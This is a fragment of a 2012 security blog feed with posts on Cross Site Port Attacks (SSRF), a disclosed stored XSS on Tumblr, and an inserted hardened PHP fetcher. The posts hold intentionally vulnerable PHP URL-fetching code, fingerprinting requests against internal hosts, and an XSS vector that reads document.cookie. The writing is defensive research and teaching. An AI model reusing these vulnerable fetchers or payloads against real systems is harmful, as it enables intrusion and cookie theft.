Most publicly available web application frameworks have distinct files and directories whose presence would indicate the type and version of the application. Most web applications also give away version and other information through meta tags and comments inside the HTML source. Specific vulnerabilities can then be researched based on the results. For example, the following unique signatures help in identifying phpMyAdmin, WordPress and Drupal instances respectively:&lt;br/&gt;
&lt;br/&gt;
Request: http://127.0.0.1:8080/phpMyAdmin/themes/original/img/b_tblimport.png&lt;br/&gt;
Request: http://127.0.0.1:8081/wp-content/themes/default/images/audio.jpg&lt;br/&gt;
Request: http://127.0.0.1:8082/profiles/minimal/translations/README.txt&lt;br/&gt;&lt;br/&gt;

The following request attempts to identify the presence of a D-Link router:&lt;br/&gt;&lt;br/&gt;
Request: http://10.0.0.1/portName.js&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-qmoaPlRuEeQ/UKLXTUD4sQI/AAAAAAAAAmQ/BXCTxiEvPmk/s1600/dlink_router_intranet.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="600" width="520" src="http://2.bp.blogspot.com/-qmoaPlRuEeQ/UKLXTUD4sQI/AAAAAAAAAmQ/BXCTxiEvPmk/s1600/dlink_router_intranet.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br/&gt;
&lt;br/&gt;

Once the web application has been identified, an attacker can then research vulnerabilities and exploit vulnerable applications. In the next post we shall see how intranet web applications can be attacked and how servers can be abused using other protocols as well. We will also take a look at fixes that are suggested for developers to thwart XSPA or limit the damage that can arise due to this vulnerability.
&lt;br/&gt;
&lt;br/&gt;


&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/BofCZXcM2NM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/960139323829785061/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-2.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/960139323829785061?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/960139323829785061?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/BofCZXcM2NM/cross-site-port-attacks-xspa-part-2.html" title="Cross Site Port Attacks - XSPA - Part 2" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-mzegxfaSdUs/UKLJ5cNq4nI/AAAAAAAAAj4/BSVgZlZIFGE/s72-c/xspa_reach_via_server.png" height="72" width="72" /><thr:total>8</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-2.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0MFR3s-fyp7ImA9WhNRGU8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-2026929239062083541</id><published>2012-11-07T03:59:00.002-08:00</published><updated>2012-11-14T13:43:36.557-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-11-14T13:43:36.557-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cross Site Port Attacks" /><category 
scheme="http://www.blogger.com/atom/ns#" term="appsecusa" /><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><title>Cross Site Port Attacks - XSPA - Part 1</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This is the first of a 3-part series of blog posts that explain Cross Site Port Attacks (XSPA) in greater detail. I disclosed this as a speaker at the recently concluded OWASP AppSecUSA2012, Austin and thought it was about time I blogged as well.
&lt;br /&gt;&lt;br /&gt;

Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-2.html"&gt;Cross Site Port Attacks - XSPA - Part 2&lt;/a&gt;
&lt;br/&gt;
Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html"&gt;Cross Site Port Attacks - XSPA - Part 3&lt;/a&gt;
&lt;br/&gt;&lt;br/&gt;

Update: Please note that this is independent research conducted as part of my involvement with Bug Bounty programs with several companies and, although related to &lt;a href="http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf"&gt;Alexander Polyakov's research on SSRF&lt;/a&gt;, the similarity in findings is merely a coincidence; the findings are focused on showing how common XSPA/SSRF are in popular web applications.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Overview&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Many web applications provide functionality to pull data from other webservers for various reasons. Using user specified URLs, web applications can be made to fetch images, download XML feeds from remote servers, text-based files, etc. This functionality can be abused by making crafted queries using the vulnerable web application as a proxy to attack other services running on remote/local servers. Attacks arising via this abuse of functionality are named Cross Site Port Attacks (XSPA).&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;What is XSPA?&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from remote servers before sending it back to the client. An attacker can send crafted queries to a vulnerable web application to proxy attacks to external Internet facing servers, intranet devices and the web server itself using the advertised functionality of the vulnerable web application. The responses, in certain cases, can be studied to identify service availability (port status, banners etc.) and even fetch data from remote services in unconventional ways.&lt;br /&gt;&lt;br /&gt;The following screengrab shows gravatar.com providing this functionality:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-NopLSb6w_0w/UJpE-eh4_1I/AAAAAAAAAio/28ndTV3SOvU/s1600/gravatar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://3.bp.blogspot.com/-NopLSb6w_0w/UJpE-eh4_1I/AAAAAAAAAio/28ndTV3SOvU/s640/gravatar.PNG" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;XSPA allows attackers to abuse available functionality in most web applications to port scan intranet and external Internet facing servers, fingerprint internal (non-Internet exposed) network aware services, perform banner grabbing, identify web application frameworks, exploit vulnerable programs, run code on reachable machines, exploit web application vulnerabilities listening on internal networks, read local files using the file protocol and much more. XSPA has been discovered with Facebook, where it was possible to port scan any Internet facing server using Facebook’s IP addresses. Subsequently, XSPA was also discovered in several other prominent web applications on the Internet, including Google, Apigee, StatMyWeb, Mozilla.org, Face.com, Pinterest, Yahoo, Adobe Omniture and several others. We will take a look at the vulnerabilities that were present in the above mentioned web applications that could be used to launch attacks and perform port scans on remote servers and intranet devices using predefined functionality.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Examples of Implementation &lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Let us look at some examples of PHP implementations of file fetching via user supplied URLs. XSPA affects web applications written in any language as long as they let users decide where the data would be fetched from. Please note the examples shown below are neither clean nor secure, however most of the parts of the code outlined below have been obtained from real world application sources.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
1.&amp;nbsp;&amp;nbsp; &amp;nbsp;PHP file_get_contents:&lt;/span&gt;&lt;/div&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&amp;lt;?php&lt;br /&gt; 
    if (isset($_POST['url'])) &lt;br /&gt;
    { &lt;br /&gt;
    $content = file_get_contents($_POST['url']); &lt;br /&gt;
    $filename = './images/'.rand().'img1.jpg'; &lt;br /&gt;
    file_put_contents($filename, $content); &lt;br /&gt;
    echo $_POST['url']."";     &lt;br /&gt;
    $img = "&amp;lt;img src=\"".$filename."\"/&amp;gt;"; &lt;br /&gt;
    } &lt;br /&gt;
    echo $img; &lt;br /&gt;
?&amp;gt;&lt;br /&gt;&lt;br /&gt;

&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This implementation fetches data as requested by a user (an image in this case) using the file_get_contents PHP function and saves it to a file with a randomly generated filename on the disk. The HTML img tag then displays the image to the user.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
2.&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP fsockopen() function:&lt;/span&gt;&lt;/div&gt;

&lt;div style="text-align: left;"&gt;

&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&amp;lt;?php &lt;br /&gt;
 function GetFile($host,$port,$link) &lt;br /&gt;
 { &lt;br /&gt;
 $fp = fsockopen($host, intval($port), $errno, $errstr, 30); &lt;br /&gt;
 if (!$fp) { &lt;br /&gt;
  echo "$errstr (error number $errno) \n"; &lt;br /&gt;
 } else { &lt;br /&gt;
  $out = "GET $link HTTP/1.1\r\n"; &lt;br /&gt;
  $out .= "Host: $host\r\n"; &lt;br /&gt;
  $out .= "Connection: Close\r\n\r\n"; &lt;br /&gt;
  $out .= "\r\n"; &lt;br /&gt;
  fwrite($fp, $out); &lt;br /&gt;
  $contents=''; &lt;br /&gt;
  while (!feof($fp)) { &lt;br /&gt;
   $contents.= fgets($fp, 1024); &lt;br /&gt;
  } &lt;br /&gt;
  fclose($fp); &lt;br /&gt;
  return $contents; &lt;br /&gt;
 } &lt;br /&gt;
 }&lt;br /&gt;
?&amp;gt;&lt;br /&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This implementation fetches data as requested by a user (any file or HTML) using the fsockopen PHP function. This function establishes a TCP connection to a socket on the server and performs a raw data transfer. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;3.&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP curl_exec() function: &lt;/span&gt;&lt;/div&gt;

&lt;div style="text-align: left;"&gt;

&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&amp;lt;?php &lt;br /&gt;
  if (isset($_POST['url']))&lt;br /&gt;
    {&lt;br /&gt;
  $link = $_POST['url'];&lt;br /&gt;
  $curlobj = curl_init();&lt;br /&gt;
  curl_setopt($curlobj, CURLOPT_POST, 0);&lt;br /&gt;
  curl_setopt($curlobj,CURLOPT_URL,$link);&lt;br /&gt;
  curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);&lt;br /&gt;
  $result=curl_exec($curlobj);&lt;br /&gt;
  curl_close($curlobj);&lt;br /&gt;
  &lt;br /&gt;
  $filename = './curled/'.rand().'.txt';&lt;br /&gt;
  file_put_contents($filename, $result);    &lt;br /&gt;
  echo $result;&lt;br /&gt;
    }&lt;br /&gt;
?&amp;gt;&lt;br /&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;


&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This is another very common implementation that fetches data using cURL via PHP. The file/data is downloaded and stored to disk under the 'curled' folder and appended with a random number and the '.txt' file extension.&lt;/span&gt;&lt;br /&gt;
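&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;All three fetchers above hand whatever URL the user supplies straight to file_get_contents, fsockopen or cURL. The following is an added example, not code from this post or from any of the applications mentioned, of a hardened replacement for the cURL variant: it accepts only http/https to a public IPv4 host on port 80 or 443, rebuilds the URL from the validated parts, pins the validated address for the real request, refuses redirects, and checks that the body is an image before saving it. The function names and the ./images/ directory are this example's own assumptions.&lt;/span&gt;&lt;br /&gt;

```php
&amp;lt;?php
// Added example, not the blog's own code: a hardened replacement for the
// user-supplied-URL fetchers shown above. Assumes PHP 7+ with the cURL
// extension on libcurl 7.21.3+ (for CURLOPT_RESOLVE); names are this example's own.

// Resolve $host and return its first IPv4 address, but only if every
// answer is public. Checking the resolved addresses rather than the
// hostname string also covers literal IPs in decimal or octal form.
// IPv6 is not handled: gethostbynamel() only returns A records.
function resolve_public_ipv4($host)
{
    $ips = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)
        ? array($host)            // literal dotted IP, no lookup needed
        : gethostbynamel($host);  // false if the name does not resolve
    if (!$ips) {
        return false;
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16; NO_RES_RANGE
        // rejects 0/8, 127/8, 169.254/16, 240/4. Every answer must pass, so
        // a name mixing public and private addresses is refused outright.
        if (!filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
            return false;
        }
    }
    return $ips[0];
}

// Check scheme, credentials, host and port before anything touches the
// network. Returns array(rebuilt_url, host, port, ip) or false.
function validate_fetch_url($url)
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return false;
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, array('http', 'https'), true)) {
        return false;   // no file://, ftp://, gopher://, dict:// and so on
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return false;   // refuse http://public.example@internal-host/ forms
    }
    $port = isset($p['port']) ? (int) $p['port'] : ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, array(80, 443), true)) {
        return false;   // any other port would turn the app into a port scanner
    }
    $ip = resolve_public_ipv4($p['host']);
    if ($ip === false) {
        return false;
    }
    // Rebuild the URL so libcurl connects to exactly the validated host and port.
    $rebuilt = $scheme . '://' . $p['host'] . ':' . $port
        . (isset($p['path']) ? $p['path'] : '/')
        . (isset($p['query']) ? '?' . $p['query'] : '');
    return array($rebuilt, $p['host'], $port, $ip);
}

// Fetch the image at $url and store it under ./images/. Returns the saved
// path, or false when the URL or the response is not acceptable.
function fetch_image($url)
{
    $target = validate_fetch_url($url);
    if ($target === false) {
        return false;
    }
    list($safe_url, $host, $port, $ip) = $target;
    $ch = curl_init($safe_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);  // a redirect to 127.0.0.1 is not followed
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    // Connect to the address that passed validation, so a second DNS lookup
    // cannot be answered with an internal address (rebinding between check and use).
    curl_setopt($ch, CURLOPT_RESOLVE, array("$host:$port:$ip"));
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($body === false || $status !== 200) {
        return false;   // errors and banners are never echoed to the client
    }
    // Store only genuine image data and never echo the raw response, so the
    // feature cannot be used to read banners, local files or intranet pages.
    $info = @getimagesizefromstring($body);
    if ($info === false || !in_array($info[2], array(IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG), true)) {
        return false;
    }
    $filename = './images/' . bin2hex(random_bytes(8)) . image_type_to_extension($info[2]);
    file_put_contents($filename, $body);
    return $filename;
}

if (isset($_POST['url'])) {
    $saved = fetch_image($_POST['url']);
    echo $saved === false ? 'URL rejected'
        : '&amp;lt;img src="' . htmlspecialchars($saved, ENT_QUOTES, 'UTF-8') . '" /&amp;gt;';
}
```

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The same validate_fetch_url() check belongs in front of the file_get_contents and fsockopen variants as well; for fsockopen the validated host and port are what get passed to the call instead of the raw user values.&lt;/span&gt;&lt;br /&gt;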
&lt;br /&gt;
&lt;br /&gt;

&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;In the next part of this series, we shall see some of the attacks that can be launched using this vulnerability. XSPA allows attackers to target the server infrastructure, mostly the intranet of the web server, the web server itself and any public Internet facing server as well. Currently, I have come across the following five different attacks that can be launched using XSPA:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;1. Port Scanning remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.&lt;br /&gt;2. Exploiting vulnerable programs running on the Intranet or on the local web server&lt;br /&gt;3. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.)&lt;br /&gt;4. Fingerprinting intranet web applications using standard application default files &amp;amp; behavior&lt;br /&gt;5. Reading local web server files using the file:/// protocol handler.&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;br /&gt;We will see examples of each of these scenarios in several prominent web applications on the Internet as well. &lt;/span&gt;&lt;br /&gt;

&lt;br /&gt;&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/PtIZmZ-1sds" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/2026929239062083541/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html#comment-form" title="11 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2026929239062083541?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/2026929239062083541?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/PtIZmZ-1sds/cross-site-port-attacks-xspa-part-1.html" title="Cross Site Port Attacks - XSPA - Part 1" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-NopLSb6w_0w/UJpE-eh4_1I/AAAAAAAAAio/28ndTV3SOvU/s72-c/gravatar.PNG" height="72" width="72" /><thr:total>11</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEcNRXc7eip7ImA9WhJREkw.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-7801033764110800585</id><published>2012-07-11T09:02:00.000-07:00</published><updated>2012-07-13T13:41:34.902-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-07-13T13:41:34.902-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="persistent" /><category 
scheme="http://www.blogger.com/atom/ns#" term="tumblr" /><category scheme="http://www.blogger.com/atom/ns#" term="stored XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="cookie monster" /><category scheme="http://www.blogger.com/atom/ns#" term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="cross site scripting" /><title>Stored (Persistent) XSS on tumblr</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Tumblr is vulnerable to a Stored (persistent) Cross Site Scripting Vulnerability, which I disclosed to them around 3 weeks ago, but it looks like it's still not fixed.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Tumblr, stylized as tumblr., is a microblogging platform and social networking website, owned and operated by Tumblr, Inc. The service allows users to post multimedia and other content to a short-form blog, named a "tumblelog". Users can follow other users' blogs, as well as make their blogs private. Much of the website's features are accessed from the "dashboard" interface, where the option to post content and posts of followed blogs appear. [Source: Wikipedia]&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Last I checked, tumblr has 63.7 Million Blogs and 27 Billion Posts [http://www.tumblr.com/about], which is why it is very discomforting to find an issue like XSS on a site that is ranked 35 on Alexa.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;For the newbies,&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank"&gt;Cross Site Scripting &lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;is a vulnerability that arises if an application does not sanitize user input and &lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;sends it back to the browser without removing/encoding 
malicious characters. Malicious characters are any set of characters 
that a browser can use to render HTML or script content 
(&amp;lt;,&amp;gt;,",/&amp;gt; etc..)&lt;/span&gt;.&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
 So, instead of displaying the user input, the browser will 
render/execute it depending on whether the input was HTML tagged content
 or script content.&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;XSS can 
cause a lot of serious problems. An attacker can steal cookies, redirect
 users to fake or malicious sites, control a user's browser using 
automated frameworks like &lt;a href="http://www.bindshell.net/tools/beef.html" target="_blank"&gt;BeEF&lt;/a&gt; and download and execute exploits on the victim's computer. Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page. Several &lt;a href="http://en.wikipedia.org/wiki/XSS_worm" target="_blank"&gt;XSS based worms&lt;/a&gt; have been created in the past that have caused a lot of trouble on popular websites like Myspace and Orkut.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;I will wait another week before posting the technical details here, in the mean time here are some screenshots for the curious:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-opr0Sc7HkQ0/T_2haIvZ-uI/AAAAAAAAAgs/LleGjvkXyws/s1600/tumblrStoredXSS.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="258" src="http://3.bp.blogspot.com/-opr0Sc7HkQ0/T_2haIvZ-uI/AAAAAAAAAgs/LleGjvkXyws/s640/tumblrStoredXSS.PNG" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2ov6pvWauUs/T_2halvOt-I/AAAAAAAAAg0/dPGx07HmRfo/s1600/tumblrStoredXSS2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://2.bp.blogspot.com/-2ov6pvWauUs/T_2halvOt-I/AAAAAAAAAg0/dPGx07HmRfo/s640/tumblrStoredXSS2.PNG" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
&lt;b&gt;Update [14 July 2012]:&lt;/b&gt;
Tumblr has fixed the Stored XSS vulnerability, so here are the technical details as promised.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The XSS issue was on the&amp;nbsp; "Register Application" page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user would create a new application. An XSS attack vector like &lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;tester"&amp;gt;&amp;lt;img src='x' onerror="alert(document.cookie)" /&amp;gt;&lt;/span&gt; would trigger an alert box, displaying the user's cookie, in the browser.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Great work on the part of the Tumblr Security team in getting this fixed. I only hope they don't wait 3 weeks before fixing something like this the next time.&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/94OcTvgxJpc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/7801033764110800585/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/07/stored-persistent-xss-on-tumblr.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7801033764110800585?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7801033764110800585?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/94OcTvgxJpc/stored-persistent-xss-on-tumblr.html" title="Stored (Persistent) XSS on tumblr" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-opr0Sc7HkQ0/T_2haIvZ-uI/AAAAAAAAAgs/LleGjvkXyws/s72-c/tumblrStoredXSS.PNG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/07/stored-persistent-xss-on-tumblr.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEBRng4cSp7ImA9WhJTFEU.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-6822303151056332209</id><published>2012-06-23T13:31:00.000-07:00</published><updated>2012-06-23T13:34:17.639-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-06-23T13:34:17.639-07:00</app:edited><category 
scheme="http://www.blogger.com/atom/ns#" term="syntax error" /><category scheme="http://www.blogger.com/atom/ns#" term="cookie monster" /><category scheme="http://www.blogger.com/atom/ns#" term="short_open_tag" /><category scheme="http://www.blogger.com/atom/ns#" term="php" /><category scheme="http://www.blogger.com/atom/ns#" term="php.ini" /><title>PHP Parse error: syntax error, unexpected $end in &lt;filename&gt; on line &lt;line number&gt; - The Error and The Fix</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
